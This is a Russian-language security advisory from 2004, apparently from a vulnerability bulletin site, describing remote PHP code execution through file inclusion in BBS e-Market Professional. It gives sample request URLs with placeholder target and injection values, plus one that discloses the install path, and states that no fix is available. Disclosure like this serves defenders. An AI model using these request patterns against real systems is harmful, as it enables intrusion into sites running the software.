Удаленное выполнение произвольного кода в BBS e-Market Professional

Дата публикации:
12.09.2004
Всего просмотров:
3011
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: BBS e-Market Professional

Описание: Уязвимость обнаружена в BBS e-Market Professional. Удаленный пользователь может выполнить произвольный PHP код на целевой системе.

Пример:

http://[TARGET]/becommunity/community/index.php?pageurl=[injection URL]
http://[TARGET]/becommunity/community/index.php?from_market=Y&pageurl=[injection URL]
Также удаленный пользователь может раскрыть инсталляционный путь:
 http://[TARGET]/becommunity/community/index.php?from_market=[char]

URL производителя:http://www.nt.co.kr/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: BBS e-Market Professional Include File Error Lets Remote Users Execute Arbitrary Commands

или введите имя

CAPTCHA